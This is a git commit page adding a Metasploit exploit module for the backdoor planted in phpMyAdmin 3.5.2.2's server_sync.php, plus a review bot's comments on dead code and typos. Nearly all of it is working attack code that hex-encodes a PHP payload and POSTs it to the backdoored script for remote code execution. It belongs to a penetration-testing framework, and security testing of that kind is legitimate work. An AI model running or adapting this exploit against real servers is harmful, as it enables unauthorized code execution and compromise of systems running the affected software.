
Add exploit for phpmyadmin backdoor

commit 3ade5a07e7bb1b1f915a6421f3f1df0895e6f16d 1 parent 93dd96d
HD Moore authored September 25, 2012
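--- a/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb
+++ b/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb
@@ -0,0 +1,82 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = NormalRanking
+
+	include Msf::Exploit::Remote::Tcp
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'phpMyAdmin 3.5.2.2 server_sync.php Backdoor',
+			'Description'    => %q{
+					This module exploits an arbitrary code execution backdoor 
+				placed into phpMyAdmin v3.5.2.2 thorugh a compromised SourceForge mirror.
+			},
+			'Author'         => [ 'hdm' ],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision$',
+			'References'     => [ ['URL', 'http://www.phpmyadmin.net/home_page/security/PMASA-2012-5.php'] ],
+			'Privileged'     => false,
+			'Payload'        =>
+				{
+					'DisableNops' => true,
+					'Compat'      =>
+						{
+							'ConnectionType' => 'find',
+						},
+					# Arbitrary big number. The payload gets sent as an HTTP
+					# response body, so really it's unlimited
+					'Space'       => 262144, # 256k
+				},
+			'DefaultOptions' =>
+				{
+					'WfsDelay' => 30
+				},
+			'DisclosureDate' => 'Sep 25 2012',
+			'Platform'       => 'php',
+			'Arch'           => ARCH_PHP,
+			'Targets'        => [[ 'Automatic', { }]],
+			'DefaultTarget' => 0))
+
+		register_options([
+			OptString.new('PATH', [ true , "The base directory containing phpMyAdmin try", '/phpMyAdmin'])
+		], self.class)
+	end
+
+	def exploit
+
+		uris = []
+
+		tpath = datastore['PATH']
+		if tpath[-1,1] == '/'
+			tpath = tpath.chop
+		end
+
+		pdata = "c=" + Rex::Text.to_hex(payload.encoded, "%")
+
+		res = send_request_raw( {
+			'global'  => true,
+			'uri'     => tpath + "/server_sync.php",
+			'method'  => 'POST',
+			'data'    => pdata,
+			'headers' => {
+				'Content-Type'   => 'application/x-www-form-urlencoded',
+				'Content-Length' => pdata.length,
+			}
+		}, 1.0)
+
+		handler
+	end
+end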
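Review bot: In `exploit`, `uris = []` is never read and the value assigned to `res` is never inspected, so both are dead code; drop the first, and either remove the `res =` assignment or use the result to report a failed request rather than silently waiting out the 30-second `WfsDelay`. Two user-facing strings also need fixing: `thorugh` in 'Description' should read `through`, and the PATH option text should be `"The base directory containing phpMyAdmin"`, since the trailing `try` looks like a leftover. The `# Arbitrary big number` comment above 'Space' says the payload is sent as an HTTP response body, but the visible code sends it in the POST request body, so the comment should say `request body`. The class also includes `Msf::Exploit::Remote::Tcp` next to `HttpClient`, yet only the HTTP request helper is called in the visible code, so the extra mixin is probably unnecessary.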

0 notes on commit 3ade5a0
